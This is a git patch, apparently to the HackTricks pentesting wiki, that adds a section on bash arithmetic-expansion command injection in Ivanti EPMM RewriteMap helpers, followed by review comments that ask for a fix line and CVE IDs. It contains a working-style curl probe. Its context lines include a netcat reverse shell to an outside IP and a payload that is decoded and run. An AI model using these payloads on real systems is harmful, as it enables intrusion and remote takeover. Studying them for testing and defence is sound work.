From 39e239244cf60e973ee8dbd1e02a4a2d8c37a694 Mon Sep 17 00:00:00 2001 From: HackTricks News Bot Date: Wed, 18 Feb 2026 02:03:29 +0000 Subject: [PATCH] Add content from: Critical Vulnerabilities in Ivanti EPMM Exploited --- src/pentesting-web/command-injection.md | 28 +++++++++++++++++++++++++ 1 file changed, 28 insertions(+) diff --git a/src/pentesting-web/command-injection.md b/src/pentesting-web/command-injection.md index fab61eb2a4d..13d7d7532b2 100644 --- a/src/pentesting-web/command-injection.md +++ b/src/pentesting-web/command-injection.md 
@@ -49,6 +49,33 @@ vuln=127.0.0.1%0anohup nc -e /bin/bash 51.15.192.49 80 vuln=echo PAYLOAD > /tmp/pay.txt; cat /tmp/pay.txt | base64 -d > /tmp/pay; chmod 744 /tmp/pay; /tmp/pay ``` +### Bash arithmetic evaluation in RewriteMap/CGI-style scripts + +RewriteMap helpers written in **bash** sometimes push query params into globals and later compare them in **arithmetic contexts** (`[[ $a -gt $b ]]`, `$((...))`, `let`). Arithmetic expansion re-tokenizes the content, so attacker-controlled variable names or array references are expanded twice and can execute. + +**Pattern seen in Ivanti EPMM RewriteMap helpers:** + +1. Params map to globals (`st` → `gStartTime`, `h` → `theValue`). +2. Later check: + ```bash + if [[ ${theCurrentTimeSeconds} -gt ${gStartTime} ]]; then + ... + fi + ``` +3. Send `st=theValue` so `gStartTime` points to the string `theValue`. +4. Send `h=gPath['sleep 5']` so `theValue` contains an array index; during the arithmetic check it runs `sleep 5` (swap for a real payload). + +Probe (~5s delay then 404 if vulnerable): + +```bash +curl -k "https://TARGET/mifs/c/appstore/fob/ANY?st=theValue&h=gPath['sleep 5']" +``` + +Notes: + +- Look for the same helper under other prefixes (e.g., `/mifs/c/aftstore/fob/`). +- Arithmetic contexts treat unknown tokens as variable/array identifiers, so this bypasses simple metacharacter filters. + ### Parameters Here are the top 25 parameters that could be vulnerable to code injection and similar RCE vulnerabilities (from [link](https://twitter.com/trbughunters/status/1283133356922884096)): 
@@ -240,5 +267,6 @@ https://github.com/carlospolop/Auto_Wordlists/blob/main/wordlists/command_inject - [When WebSockets Lead to RCE in CurseForge](https://elliott.diy/blog/curseforge/) - [PaperCut NG/MF SetupCompleted auth bypass → print scripting RCE](https://0xdf.gitlab.io/2026/02/03/htb-bamboo.html) - [CVE-2023-27350.py (auth bypass + print scripting automation)](https://github.com/horizon3ai/CVE-2023-27350/blob/main/CVE-2023-27350.py) +- [Unit 42 – Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/) {{#include ../banners/hacktricks-training.md}}
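Review bot: in the first hunk (the new "Bash arithmetic evaluation in RewriteMap/CGI-style scripts" section), the root cause is explained but the section gives no remediation guidance and never states the CVE identifiers that the reference added in the second hunk carries in its URL (cve-2026-1281, cve-2026-1340), so a reader cannot match the section to an advisory or patch level. Suggest a short "Fix" line after the "Notes:" list along the lines of "Validate that each parameter is purely numeric before it reaches `-gt`, `$((...))` or `let` (e.g. `[[ $gStartTime =~ ^[0-9]+$ ]] || exit 1`), since those contexts evaluate any string they are handed as an arithmetic expression", and name the CVE IDs in the heading or first sentence. Two smaller points: the heading promises "CGI-style scripts" but the body only discusses RewriteMap helpers, and the probe line "~5s delay then 404 if vulnerable" does not say what a patched host returns, so the timing signal is the only discriminator described; stating the expected non-vulnerable response would make the check unambiguous.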
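Review bot: in the second hunk, the new reference entry omits the CVE identifiers that its own URL contains, unlike the neighbouring PaperCut entry which names CVE-2023-27350 in its link text; suggest `- [Unit 42 – CVE-2026-1281 / CVE-2026-1340: Bash arithmetic expansion RCE in Ivanti RewriteMap scripts](https://unit42.paloaltonetworks.com/ivanti-cve-2026-1281-cve-2026-1340/)` so the entry is findable by advisory ID and consistent with the list's existing style.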